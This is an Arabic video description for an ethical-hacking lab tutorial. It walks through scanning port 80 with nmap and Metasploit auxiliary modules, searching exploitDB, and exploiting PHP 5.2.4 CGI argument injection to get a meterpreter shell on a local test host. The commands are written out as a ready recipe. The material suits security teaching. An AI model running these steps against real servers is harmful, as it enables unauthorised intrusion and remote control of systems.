في هذا الدرس شرحنا طريقة استغلال و فحص منفذ 80 الذي يسمى ببروتوكول HTTP وتعرفنا على اصدار APACHE و PHP المثبت بالسيرفر,
بعد ذالك تحصلنا على العديد من المعلومات اللتي من خلالها نستطيع ان نخترق هذا السيرفر...
وهذه بعض الخطوات مكتوبة:
======
1) في الاول فحصنا المنفذ 80 باداة NMAP:
nmap -sV -p 80 192.168.1.9
2) ثم استخدمنا SCRIPT http-enum لالحصول على بعض المعلومات
nmap --script http-enum -p 80 192.168.1.9
3) بعد ذالك استخدمنا بعض السكربتات اللتي يوفرها metasploit:
- use auxiliary/scanner/http/http_version
- use auxiliary/scanner/http/dir_scan
- use auxiliary/scanner/http/files_dir
4) ثم شرحت لكم كيفية البحث عن الثغرات في داخل exploitDB:
searchsploit php 5.2.4 apache 2.2.8
5) و في الاخير استخدمنا ثغرة تتواجد في اصدار PHP 5.2.4 و تحصلنا على meterpreter:
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.1.9
set LHOST 192.168.1.13
run
======
ان اعجبك المقطع اضغط على زر LIKE ولا تنسوا الاشتراك بالقناة و تفعيل زر الجرس وان كان لكم اي استفسار اترك تعليق بالاسفل...
===========
تحذير:
جميع المعلومات الواردة في هذا الفيديو هي لأغراض تعليمية وبحثية فقط ،
البرنامج التعليمي والعرض التوضيحي المقدم على CyberBlindTech مخصص فقط لأولئك الذين لديهم الاستعداد والفضول لمعرفة والتعرف على القرصنة الأخلاقية واختبار الأمان والاختراق.
لست مسؤولاً عن أي إجراء يقوم به أي شخص ،
أركز في الغالب على البرمجة والبرامج التعليمية ودليل الأمان ودروس Pentesting والقرصنة الأخلاقية. إذا كنت تخطط لاستخدام المحتوى لغرض غير قانوني ، فالرجاء مغادرة هذه القناة على الفور ، شكرًا!!!
Disclaimer
All information provided on this video are for educational and research purpose only,
The tutorial and demo provided on CyberBlindTech is only for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing.
I'm not responsible for any action performed by anyone,
I mostly focus on Programming, Tutorials, Security Guide, Pentesting tutorials and Ethical hacking. If you planned to use the content for illegal purpose, please leave this Channel immediately, Thanks!!
===========
#kali_linux #metasploitable #http #hack #scan #nmap #exploit #php #auxilary #post #msf #vulns #scripts #python #bruteforce #telnet #ftp #email #mail #server #hackserver #tuto #hacktuto #kalituto #tools #hacktools #enumeration #hacking #ethicalhacking #cybersecurity #hackwindows #metasploit-framework #kali2022 #penetrationtesting #hacknews #0days #exploitdb #vulnerability #kali #metasploit#visuallyImpaired #hacking #tutorials #windows #hacking #exploit #tech #cyberSecurity #ethical_hacking #technews #teaching #learning #technology
7 сен 2024